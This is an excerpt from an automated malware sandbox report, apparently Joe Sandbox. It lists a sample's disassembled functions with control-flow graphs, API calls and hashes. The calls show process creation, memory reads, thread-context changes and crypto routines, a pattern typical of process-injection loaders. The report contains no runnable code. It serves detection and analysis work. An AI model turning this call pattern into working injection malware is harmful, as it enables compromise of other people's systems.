                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 03a2004013140942733bdaa927d206a33c9ecafd5dee3ef4f3e5ee7f5b8ce5a6
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: 8090027EA4582245124177E5052BD8E9D043BE3B40B449005A082014030C011614D237
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005A2630, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 5a2630-5a263f call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: 1a29499123779eb327c6467ed996582b03211976afbaf0aefc381dc9cdc1ae28
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: A890023D1054064622017FF8042FB8E5C003BDA740F888501A14B419135D100410E537
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005A26B0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 5a26b0-5a26bf call 5a1980 call 5a2600
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: 26ae7e0a5234e1a818c55cd05fe20ae1a2ddb8f114118e7cacfb915d466a19a8
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: 7490023F60540646030077E4287BF8E5D447BE6790B458009E006519035D004410E137
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00580000, Relevance: 144.4, Strings: 115, Instructions: 616UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 580000-58000d 1 58000f-580013 0->1 2 580015-580017 0->2 1->2 3 58001c-580c58 call 580db0 1->3 4 580da6-580da9 2->4 12 580c5a-580c68 3->12 13 580c90-580cbd 3->13 14 580c6c-580c6e 12->14 17 580cbf-580cc1 13->17 18 580cc6-580cd0 13->18 14->13 16 580c70-580c87 14->16 16->13 23 580c89-580c8b 16->23 17->4 19 580ce1-580cea 18->19 21 580d08-580d1c 19->21 22 580cec-580d06 19->22 25 580d2d-580d34 21->25 22->19 23->4 26 580d43-580d72 25->26 27 580d36-580d41 25->27 29 580d76-580d78 26->29 27->25 30 580d7a-580d7c 29->30 31 580d7e-580d9b 29->31 30->4 33 580d9d-580d9f 31->33 34 580da1 31->34 33->4 34->4
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.323124687.00580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_580000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: be000f52bce4dcd1e50f743aed318fc3c9dcf0c12aa6391d2096f37728531638
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: 6692582090C7D9D9EB32C6788C587DDBEB11B27314F0841D9D5D83A2D2C7BA1B89CB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005A1980, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 35 5a1980-5a1a2e call 5a1000 38 5a1a35-5a1a5e call 5a2860 CreateFileW 35->38 41 5a1a60 38->41 42 5a1a65-5a1a78 38->42 43 5a1bb9-5a1bbd 41->43 49 5a1a7a 42->49 50 5a1a7f-5a1a99 VirtualAlloc 42->50 44 5a1bbf-5a1bc3 43->44 45 5a1c05-5a1c08 43->45 47 5a1bcf-5a1bd3 44->47 48 5a1bc5-5a1bc8 44->48 51 5a1c0b-5a1c12 45->51 52 5a1be6-5a1bea 47->52 53 5a1bd5-5a1bdf 47->53 48->47 49->43 54 5a1a9b 50->54 55 5a1aa0-5a1aba ReadFile 50->55 56 5a1c67-5a1c7c 51->56 57 5a1c14-5a1c1f 51->57 62 5a1bec-5a1bf6 52->62 63 5a1bfd 52->63 53->52 54->43 64 5a1abc 55->64 65 5a1ac1-5a1b01 VirtualAlloc 55->65 60 5a1c7e-5a1c89 VirtualFree 56->60 61 5a1c8f-5a1c97 56->61 58 5a1c23-5a1c2f 57->58 59 5a1c21 57->59 66 5a1c43-5a1c4f 58->66 67 5a1c31-5a1c41 58->67 59->56 60->61 62->63 63->45 64->43 68 5a1b08-5a1b23 call 5a2ab0 65->68 69 5a1b03 65->69 72 5a1c5c-5a1c62 66->72 73 5a1c51-5a1c5a 66->73 71 5a1c65 67->71 75 5a1b2e-5a1b38 68->75 69->43 71->51 72->71 73->71 76 5a1b3a-5a1b69 call 5a2ab0 75->76 77 5a1b6b-5a1b7f call 5a28c0 75->77 76->75 83 5a1b83-5a1b87 77->83 84 5a1b81 77->84 85 5a1b89-5a1b8d CloseHandle 83->85 86 5a1b93-5a1b97 83->86 84->43 85->86 87 5a1baa-5a1bb3 86->87 88 5a1b99-5a1ba4 VirtualFree 86->88 87->38 87->43 88->87
                  APIs
                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 005A1A51
                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 005A1C89
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: CreateFileFreeVirtual
                  • String ID: |"Z
                  • API String ID: 204039940-2393290476
                  • Opcode ID: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction ID: e18daeba11334e8f2a33cb7d0495ad30b298fc31351f509367533032547c891c
                  • Opcode Fuzzy Hash: 61ae92364ca28658410062bed1a011159a615ec3b8f6d1c7bbb5100bd63cb779
                  • Instruction Fuzzy Hash: 27A11A74E00609EBDB14CFA4C995BEEBBB5BF49304F208599E505BB280D7759E40CBA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005A1470, Relevance: 9.4, APIs: 6, Instructions: 383processCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 89 5a1470-5a1504 call 5a2a90 * 3 96 5a151b 89->96 97 5a1506-5a1510 89->97 99 5a1522-5a153b 96->99 97->96 98 5a1512-5a1519 97->98 98->99 101 5a153d-5a1540 99->101 102 5a1545 99->102 103 5a18e7-5a18e9 101->103 104 5a154c-5a1576 CreateProcessW 102->104 106 5a1578 104->106 107 5a157d-5a1597 104->107 108 5a1899-5a189d 106->108 112 5a1599 107->112 113 5a159e-5a15b9 ReadProcessMemory 107->113 110 5a189f-5a18a3 108->110 111 5a18e5 108->111 114 5a18b5-5a18b9 110->114 115 5a18a5-5a18b1 110->115 111->103 112->108 118 5a15bb 113->118 119 5a15c0-5a15c9 113->119 116 5a18bb-5a18be 114->116 117 5a18c2-5a18c6 114->117 115->114 116->117 121 5a18c8-5a18cb 117->121 122 5a18cf-5a18d3 117->122 118->108 123 5a15cb-5a15da 119->123 124 5a15f2-5a160e call 5a2150 119->124 121->122 126 5a18e0-5a18e3 122->126 127 5a18d5-5a18db call 5a20a0 122->127 123->124 128 5a15dc-5a15e4 call 5a20a0 123->128 133 5a1610 124->133 134 5a1615-5a1638 call 5a2290 124->134 126->103 127->126 132 5a15e9-5a15eb 128->132 132->124 135 5a15ed 132->135 133->108 138 5a163a-5a163e 134->138 139 5a167f-5a16a0 call 5a2290 134->139 135->108 141 5a167a 138->141 142 5a1640-5a1671 call 5a2290 138->142 145 5a16a2 139->145 146 5a16a7-5a16c5 call 5a2ab0 139->146 141->108 149 5a1678 142->149 150 5a1673 142->150 145->108 152 5a16d0-5a16da 146->152 149->139 150->108 153 5a16dc-5a170e call 5a2ab0 152->153 154 5a1710-5a1714 152->154 153->152 156 5a171a-5a172a 154->156 157 5a17ff-5a181c call 5a1ca0 154->157 156->157 160 5a1730-5a1740 156->160 165 5a181e 157->165 166 5a1820-5a183f SetThreadContext 157->166 160->157 161 5a1746-5a176a 160->161 164 5a176d-5a1771 161->164 164->157 167 5a1777-5a178c 164->167 165->108 168 5a1843-5a184e call 5a1fd0 166->168 169 5a1841 166->169 171 5a17a0-5a17a4 167->171 175 5a1852-5a1856 168->175 176 5a1850 168->176 169->108 173 5a17e2-5a17fa 171->173 174 5a17a6-5a17b2 171->174 173->164 177 5a17e0 174->177 178 5a17b4-5a17de 174->178 179 5a1858-5a185c CloseHandle 175->179 180 5a185f-5a1863 175->180 176->108 177->171 178->177 179->180 182 5a186c-5a1870 180->182 183 5a1865-5a1869 CloseHandle 180->183 184 5a1879-5a187d 182->184 185 5a1872-5a1876 CloseHandle 182->185 183->182 186 5a188a-5a1893 184->186 187 5a187f-5a1885 call 5a20a0 184->187 185->184 186->104 186->108 187->186
                  APIs
                  • CreateProcessW.KERNEL32(?,00000000), ref: 005A1571
                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005A15B4
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: Process$CreateMemoryRead
                  • String ID:
                  • API String ID: 2726527582-0
                  • Opcode ID: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction ID: 14e23d45a34b2b31230b285c2d3060c628fe56dcac0e6220b2085c5311d597fc
                  • Opcode Fuzzy Hash: 475f0689a72174ff0ae04c85c88f1a3403d427bfc216527feeb2969a55ebaa05
                  • Instruction Fuzzy Hash: 6CF13A74E00609EFDB14CF98C885FEEBBB6BF89304F248559E615AB280D774E941CB54
                  Uniqueness

                  Uniqueness Score: 5.06%

                  Function 003E002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 3e002d-3e009e call 3e0467 * 6 202 3e00a7-3e00b0 189->202 203 3e00a0-3e00a2 189->203 202->203 205 3e00b2-3e00b6 202->205 204 3e045f-3e0466 203->204 205->203 206 3e00b8-3e00c2 205->206 207 3e00e6-3e0107 GetNativeSystemInfo 206->207 208 3e00c4-3e00c7 206->208 207->203 209 3e0109-3e0133 VirtualAlloc 207->209 210 3e00c9-3e00cf 208->210 211 3e016c-3e0176 209->211 212 3e0135-3e013d 209->212 213 3e00d6 210->213 214 3e00d1-3e00d4 210->214 217 3e0178-3e017d 211->217 218 3e01b0-3e01c1 211->218 216 3e013f-3e0142 212->216 215 3e00d9-3e00e4 213->215 214->215 215->207 215->210 221 3e015d-3e015f 216->221 222 3e0144-3e014c 216->222 223 3e0181-3e0194 217->223 219 3e01c3-3e01dd 218->219 220 3e0240-3e024c 218->220 242 3e022e-3e023a 219->242 243 3e01df 219->243 224 3e02fc-3e0306 220->224 225 3e0252-3e0269 220->225 227 3e0161-3e0166 221->227 222->221 226 3e014e-3e0151 222->226 228 3e0196-3e019f 223->228 229 3e01a5-3e01aa 223->229 231 3e030c-3e0313 224->231 232 3e03c3-3e03d8 call 5a1900 224->232 225->224 234 3e026f-3e027f 225->234 236 3e0158-3e015b 226->236 237 3e0153-3e0156 226->237 227->216 238 3e0168 227->238 228->228 230 3e01a1 228->230 229->223 233 3e01ac 229->233 230->229 239 3e0315-3e031e 231->239 263 3e03da-3e03df 232->263 233->218 240 3e02e1-3e02f2 234->240 241 3e0281-3e0285 234->241 236->227 237->221 237->236 238->211 245 3e03b8-3e03bd 239->245 246 3e0324-3e033e 239->246 240->234 250 3e02f8 240->250 247 3e0286-3e0295 241->247 242->219 244 3e023c 242->244 249 3e01e3-3e01e7 243->249 244->220 245->232 245->239 251 3e0358-3e035a 246->251 252 3e0340-3e0342 246->252 253 3e029d-3e02a6 247->253 254 3e0297-3e029b 247->254 255 3e01e9 249->255 256 3e0207-3e0210 249->256 250->224 261 3e035c-3e035e 251->261 262 3e0373-3e0375 251->262 257 3e034b-3e034e 252->257 258 3e0344-3e0349 252->258 260 3e02cf-3e02d3 253->260 254->253 259 3e02a8-3e02ad 254->259 255->256 264 3e01eb-3e0205 255->264 272 3e0213-3e0228 256->272 265 3e0350-3e0356 257->265 258->265 266 3e02af-3e02be 259->266 267 3e02c0-3e02c3 259->267 260->247 273 3e02d5-3e02dd 260->273 268 3e0364-3e0366 261->268 269 3e0360-3e0362 261->269 274 3e037c-3e0381 262->274 275 3e0377 262->275 270 3e045d 263->270 271 3e03e1-3e03e5 263->271 264->272 277 3e0384-3e03ae VirtualProtect 265->277 266->260 267->260 278 3e02c5-3e02cb 267->278 268->262 280 3e0368-3e036a 268->280 276 3e0379-3e037a 269->276 270->204 271->270 279 3e03e7-3e03f1 271->279 272->249 281 3e022a 272->281 273->240 274->277 275->276 276->277 277->203 282 3e03b4 277->282 278->260 279->270 283 3e03f3-3e03f7 279->283 280->277 284 3e036c-3e0371 280->284 281->242 282->245 283->270 285 3e03f9-3e040a 283->285 284->277 285->270 286 3e040c-3e0411 285->286 287 3e0413-3e0420 286->287 287->287 288 3e0422-3e0426 287->288 289 3e043e-3e0444 288->289 290 3e0428-3e043a 288->290 289->270 292 3e0446-3e045c 289->292 290->286 291 3e043c 290->291 291->270 292->270
                  APIs
                  • GetNativeSystemInfo.KERNEL32(?,?,?,?,003E0005), ref: 003E00EB
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,003E0005), ref: 003E0113
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: cbfe8298b61e497efe309f90620b599b7266558e5100ec4ffa4d216141003c19
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: 8FE1E4756043A68FDB19CF5AC88472AB3E0FF84304F19462DE9859B6C1E7B4EC85CB91
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005A1900, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 5a1900-5a1978 call 5a18f0 call 5a1000 call 5a1470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 005A196E
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: b7695b00158be5c01678f05fb907ee46741b3861644c6a815c46d82af9f6798a
                  • Instruction ID: a8da38343eeb1e8466a66eb2ece5ec5ef3e08994ce5188536997fea326a93764
                  • Opcode Fuzzy Hash: b7695b00158be5c01678f05fb907ee46741b3861644c6a815c46d82af9f6798a
                  • Instruction Fuzzy Hash: CEF0C235D001099BEB10EFB4C8057DEFBB9FB45310F00809AAA0467241FA311A0ACBD5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 005A2AD0, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 5a2ad0-5a2ada 303 5a2adc-5a2ae7 IsWow64Process 302->303 304 5a2afd 302->304 305 5a2ae9-5a2aef 303->305 306 5a2af1 303->306 307 5a2aff-5a2b01 304->307 308 5a2af8-5a2afb 305->308 306->308 308->307
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 005A2AE2
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 0364776ab2d0946e2b33cd6dfbea6f3e07c7175ed82623ebbb30598407c17a10
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: 3BE04F3090924CEBCB24DF9CC8457AD7BB8BB01311F100255EC11932C0D7B59E44E751
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  Function 003E48C1, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: P>
                  • API String ID: 2102423945-2683032675
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: 32ddaf97aecfcd05b134fa1a5580021772929d3206dc4b262859381be3641460
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: A1025D309006BAEFCB1BCF29C9956FAB775FF08300F240269C55597A82D732B965CB94
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 003E50E8, Relevance: 1.7, Strings: 1, Instructions: 416UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bce4fb890819c2db83a58ab38be853a66c898c16f1fcb0fea0736f78ff77f596
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: 1A022270511FA08FCB76CA2AC680666B7F1BF547287604E2EC6E786E91D632F845CF14
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 003E50E4, Relevance: 1.5, Strings: 1, Instructions: 239UNIQUE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`>
                  • API String ID: 0-16645313
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: ff9ca01698094b98b67ac26334a6b33bd391c6fdfb0575a6f1cd48a8c28c91d6
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: 97A12430511FA18FCB76CF2AC684666B7F1BF54718B504E2ED6E786A91D631F881CB04
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 005A2970, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: 5f9051342f8cc7df24660d884268e6725b28cac7d06b0ab4c3e92a4061644ecf
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 1241A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB50
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E22AF, Relevance: .1, Instructions: 92COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: 8a295e84d98703089f8c991542c374d307de86eab711fd1dc53ca8fe8e586579
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: D841C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E0467, Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: a6268aa1a12c76abe65c36f4bb2ff502a81696beb927c03f5fbbd43952843c08
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 513105365043968FC715DF1AC580A2AB3F4FF89304F460AADE59187382D370F9468F91
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00580E18, Relevance: .1, Instructions: 61COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.323124687.00580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_580000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: 194ef249350d79b60592127ebff7aaf003cda0dca3f1707636b96bf405c1a053
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 4D1170B23401019FDB94DF55DC81EA777EAFB88320B298455ED04DB352D675E801C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005A2860, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 75c2a94ece0c4d6ce3906515192727f089bec3eb81bf81f8b7d84277d0f8790f
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: 85019278E10209EFCB48DF98C5919AEFBB5FF89310F208599E809A7741D734AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 005A2800, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.323182929.005A1000.00000020.00000001.sdmp, Offset: 005A1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_5a1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 23449fc2e8268b877ee5e72c7e2a2dc383d1a5555f459d6e9bab7b826c1f7833
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: 62019278E00209EFCB48DF98C5919AEFBB5FF49310F208599E919A7701E734AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E213F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: ccea1498e9dcd4a6f2d1b8edf8d4b891009289f168165882cd5ee3fae74e037a
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: B6019278E00249EFCB49DF99C5909AEF7B9FF48310F208699E909A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E219F, Relevance: .0, Instructions: 35COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: b7929d17dcb49ff70fc1aa94fe6094c37578c5ee191ac4d5bcbbe5b486f617ce
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: DE01D278A00248EFCB44DF99C5909AEF7B9FF48310F208299E909A7741D730AE41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 003E2C0C, Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_3e0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
